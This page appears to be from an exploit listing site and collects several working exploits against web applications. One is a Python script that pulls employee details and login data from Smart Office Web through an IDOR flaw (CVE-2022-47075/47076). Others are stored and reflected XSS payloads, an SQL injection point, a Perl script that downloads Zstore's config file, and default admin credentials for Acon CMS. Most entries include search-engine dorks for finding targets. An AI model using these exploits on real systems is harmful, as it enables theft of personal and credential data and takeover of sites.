Latest exploits :: CodePwn

<pre><code># Exploit Title: Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated) # Shodan Dork:: inurl:"https://www.shodan.io/search?query=smart+office" # Date: 09/Dec/2022 # Exploit Author: Tejas Nitin Pingulkar (https://cvewalkthrough.com/) # Vendor Homepage: https://smartofficepayroll.com/ # Software Link: https://smartofficepayroll.com/downloads # Version: Smart Office Web 20.28 and before # CVE Number : CVE-2022-47075 and CVE-2022-47076 # CVSS : 7.5 (High) # Reference : https://cvewalkthrough.com/smart-office-suite-cve-2022-47076-cve-2022-47075/ # Vulnerability Description: # Smart Office Web 20.28 and before allows Remote Information Disclosure(Unauthenticated) via insecure direct object reference (IDOR). This was fixed in latter version except for ExportEmployeeDetails. import wget import os from colorama import Fore, Style def download_file(url, filename): wget.download(url, filename) # Disclaimer print(Fore.YELLOW + "Disclaimer: This script is for educational purposes only.") print("The author takes no responsibility for any unauthorized usage.") print("Please use this script responsibly and adhere to the legal and ethical guidelines.") agree = input("Do you agree to the disclaimer? (1 = Yes, 0 = No): ") if agree != "1": print("You have chosen not to agree. Exiting the script.") exit() # Print name in red name = "Exploit by Tejas Nitin Pingulkar" print(Fore.RED + name) print(Style.RESET_ALL) # Reset color website = input("Enter URL [https://1.1.1.1:1111 or http://1.1.1.1]: ") target_version = input("Is the target software version 20.28 or later? (1 = Yes, 0 = No): ") folder_name = input("Enter the folder name to save the files: ") # Create the folder if it doesn't exist if not os.path.exists(folder_name): os.makedirs(folder_name) urls_filenames = [] if target_version == "1": urls_filenames.append((website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeOtherDetails", "ExportEmployeeOtherDetails.csv")) else: urls_filenames.extend([ (website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails", "ExportEmployeeDetails.csv"), (website + "/DisplayParallelLogData.aspx", "DisplayParallelLogData.txt"), (website + "/ExportReportingManager.aspx", "ExportReportingManager.csv"), (website + "/ExportEmployeeLoginDetails.aspx", "ExportEmployeeLoginDetails.csv") ]) print("CVE-2022-47076: Obtain user ID and password from downloaded source") for url, filename in urls_filenames: download_file(url, os.path.join(folder_name, filename)) # Print "for more such interesting exploits, visit cvewalkthrough.com" in red print(Fore.RED + "\nFor more such interesting exploits, visit cvewalkthrough.com") print(Style.RESET_ALL) # Reset color </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://fastcms.net/ │ │ Vendor : fastCMS │ │ Software : fastCMS Blogging 3.1.0 │ │ Vuln Type: Stored XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Allow Attacker to inject malicious code into website, give ability to steal sensitive │ │ information, manipulate data, and launch additional attacks. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ## Stored XSS ----------------------------------------------- POST /demo/blog-post/599/how-to-choose-the-perfect-university-for-a-career-in-medicine/ HTTP/2 name=cracker&email=[anything]&website=[anything]&comment=[XSS Payload]&submit= ----------------------------------------------- POST parameter 'comment' is vulnerable to XSS ## Steps to Reproduce: 1. Visit any [Categorie] (as Guest) 2. Scroll Down to [Leave a Reply] 3. Inject your [XSS Payload] in "Comments Window" 4. Press [Post Comment] 5. When the Admin Visit the [Comments] to Check [Pending Comments] on this Path (https://website/admin/modules/comments/comments.php?page=pending) 6. XSS will Fire & Executed on his Browser [-] Done </code></pre>

<pre><code>======================================================================================| | # Title : ACJWEB DESIGNER v 1.0 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | | # Vendor : aluizio81@gmail.com | | # Drok : inurl:sobre.php?id= | ======================================================================================| poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use payload : busca.php?pag=2'%22()%26%25<ScRiPt%20>prompt(947548)</ScRiPt> [+] http://127.0.0.1/www/asmac.combr/busca.php?pag=2'%22()%26%25<ScRiPt%20>prompt(947548)</ScRiPt> Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Zstore version 6.5.4 Database Disclosure Exploit | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | | # Vendor : https://github.com/leon-mbs/zstore/releases/tag/6.5.4 | | # Dork : "Zippy склад" | ==================================================================================================================================== poc : [-] Download database backup : This file may disclose sensitive information. This information can be used to launch further attacks. [+] Dorking İn Google Or Other Search Enggine. [+] save code as perl file : poc.pl [+] code : #!/usr/bin/perl -w # Author : indoushka use LWP::Simple; use LWP::UserAgent; system('cls'); print "\n[+] Zstore version 6.5.4 Database Disclosure [+] \n\n"; system('color a'); if(@ARGV < 2) { print "[+] Author : indoushka \n\n"; print "[-] How To Use\n\n"; &help; exit(); } sub help() { print "[+] usage1 : perl $0 site.com /path/db.sql \n"; print "[+] usage2 : perl $0 localhost /db.sql \n"; } ($TargetIP, $path, $File,) = @ARGV; $File="config/config.ini"; my $url = "http://" . $TargetIP . $path . $File; print "\n Fuck you wait!!! \n\n"; my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($url,":content_file" => "D:/db.sql"); if ($request->is_success) { print "[+] $url Exploited!\n\n"; print "[+] Database saved to D:/.env\n"; exit(); } else { print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n"; exit(); } Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Acon - Architecture and Construction Website CMS v1.2 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Vendor : https://www.mother-of-mangrove.com/xicia/cc/acon/ | | # Dork : Acon - Building and Architecture Website CMS | ==================================================================================================================================== poc : [+] The vulnerability is about leaving the default settings During the installation of the script and using the default username and password [+] Dorking In Google Or Other Search Enggine . [+] use login : Username: admin@gmail.com & Password: 1234 [+] http://127.0.0.1/www/demoslycom/xicia/cc/acon/admin/ ====Greetings to :=================================================================================================================== | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | ===================================================================================================================================== </code></pre>

<pre><code>======================================================================================| | # Title : ACJWEB DESIGNER 1.0 - SQL Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | | # Vendor : aluizio81@gmail.com | | # Drok : inurl:sobre.php?id= | ======================================================================================| poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use payload : http://127.0.0.1/asmac.combr/sobre.php?id= <======inject here [+] login = login.php Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | ======================================================================================================================================= </code></pre>